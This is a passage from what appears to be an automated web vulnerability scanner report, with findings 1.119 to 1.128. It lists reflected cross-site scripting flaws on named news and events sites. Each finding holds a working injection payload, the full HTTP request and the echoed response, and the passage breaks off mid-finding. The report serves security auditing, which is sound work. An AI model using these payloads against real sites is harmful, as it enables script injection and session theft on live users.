Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64744


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" type="application/rss+xml" title=" O.C. in top three for job growth - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c\"><script>alert(1)</script>737289185c2=1feed/" />
...[SNIP]...

1.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aef0"><script>alert(1)</script>a10a5ec7939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2aef0"><script>alert(1)</script>a10a5ec7939=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:04:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "d45dd6fb38635da348595e70063c67d0"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=ZnQm83phUT7lm535Hcc9Hw.100548874; path=/; expires=Fri, 03-Feb-2012 19:04:52 GMT
Set-Cookie: zvents_tracker_sid=ZnQm83phUT7lm535Hcc9Hw.100548874; path=/; expires=Fri, 03-Feb-2012 19:04:52 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNGJjZjhlMDk1NjdlM2MxN2UyMWU3MGYzNGIyNjFkYjAiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--27664081a0eab3f3b2e0027627338ca81f9e5efe; path=/; expires=Tue, 03-May-2011 19:04:52 GMT; HttpOnly
Content-Length: 53016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?2aef0"><script>alert(1)</script>a10a5ec7939=1" />
...[SNIP]...

1.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 36
ETag: "780885bfeb8e7922802451bddfb87c7b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYzkxOGM4MzUxZTczYWE2NzhkNzNjNzhiNDM0ZTlhZmIiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--caf4bc8c9f78d4a14f6eb98c46966d71fd36d308; path=/; expires=Tue, 03-May-2011 19:05:15 GMT; HttpOnly
Content-Length: 65327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?f9e5a"><script>alert(1)</script>8d769312283=1" />
...[SNIP]...

1.121. http://events.ocregister.com/json [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f&limit=7&p=49&sid=za5509dx0r HTTP/1.1
Host: events.ocregister.com
Proxy-Connection: keep-alive
Referer: http://www.ocregister.com/templates/zventsIframe.php?domain=events.ocregister.com&c=Irvine%2CCA&template=zventsOCR.html&z=92614&p=49&r=30&t=Things+to+do+in+Orange+County
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 18:54:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 52
ETag: "d7c036a0dd93fed8ab5b6c1e4b9f60d9"
X-Content-Digest: 34be3dfebb38770614f9987162ba8d7ae756151c
Cache-Control: max-age=1800, public
Set-Cookie: welcome=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Set-Cookie: zvents_tracker_sid=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Age: 0
Content-Length: 22080

Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Hair","price":"$20-$80","private":false,"editors_pick":false,"url":"http://www.scfta.org/home/Events/EventDetail.aspx?EventID=996","approv
...[SNIP]...

1.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 35
ETag: "c0f4f1fc3bc6259535d47d2f6f8cb72b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMmVjZjJiZWU3YjBlM2M3MDU1OGVkNzU1ZjBlZGQwNjgiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--3e161b60fc3c855f9fa48059642bdc8dd590f651; path=/; expires=Tue, 03-May-2011 19:05:24 GMT; HttpOnly
Content-Length: 45429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" />
...[SNIP]...

1.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "6be2db74288711698c669e7a4a441f54"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYmZjOTM3OTUyZGFmODA5NzJkNGZkYzVlNTgxMWY3Y2YiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0416affebe758d5443df7bf22fee89ccc5ebb2d5; path=/; expires=Tue, 03-May-2011 19:05:09 GMT; HttpOnly
Content-Length: 57433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1" />
...[SNIP]...

1.124. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 49
ETag: "77bab4dbd9d6705a99eb02a79686ff79"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYzY3ZDI5MTI2YTYwZTViNjY1NGI5NGJjNDBmMjkzMGIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--6eb02058b9d8e991c3b0e92b4a5c4148ea061dad; path=/; expires=Tue, 03-May-2011 19:09:31 GMT; HttpOnly
Content-Length: 18755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Invalid search: event7c80e<script>alert(1)</script>e0b48eab0cb is not a valid search category.
</div>
...[SNIP]...

1.125. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "06f028fda06900f1b13fd20c60054a4b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODhmOTVmNzQ1MDU4YzUyMDBiM2I0YzY3ZWFlYTEzN2QiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--ec067a790e483d7dfe8d4b6ea1297846b4520489; path=/; expires=Tue, 03-May-2011 19:09:25 GMT; HttpOnly
Content-Length: 19030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<body id="body_event1f25f"><script>alert(1)</script>de56addb30">
...[SNIP]...

1.126. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 40
ETag: "1a5e0c8a97b19fe60caf34eff0246e51"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYTQ4MTRmMjM0YTA1NWE1OWU0ZGZjYjZlZDUxMDUwZDMiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--74df95328582d01966b7282bb77a024258216284; path=/; expires=Tue, 03-May-2011 19:09:29 GMT; HttpOnly
Content-Length: 17945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<script type="text/javascript">
Zvents.tracker.notifySearchView(
'',
'',
'st=eventd737d';alert(1)//cee44e0808f&what=superbowl11&where=Irvine%2CCA&ssi=0&ssrss=5&srss=11');
</script>
...[SNIP]...

1.127. http://events.ocregister.com/search [st_select parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 44
ETag: "44bc00ad2514211a96a52b1d0a58abc4"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODQwMzk0YTE3NzM0YWZjM2FhOWIwODk4ZWViNTMzMDgiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--88663952c7d141dd6941ee06454236f0b51afd35; path=/; expires=Tue, 03-May-2011 19:09:26 GMT; HttpOnly
Content-Length: 18078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
nel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CA event744e1";alert(1)//1e62870ad6ds";

//-->
...[SNIP]...

1.128. http://events.ocregister.com/search [svt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:10:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 102
ETag: "4cd0d17676110543bb27db6048bc57cc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNmU3NTM0ZjgxZTI4MmI2MjMzY2I0YjgxYTFhZTU0YTAiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--a49d664e70e77f5c44832f46c21f504a901eeece; path=/; expires=Tue, 03-May-2011 19:10:05 GMT; HttpOnly
Content-Length: 33453

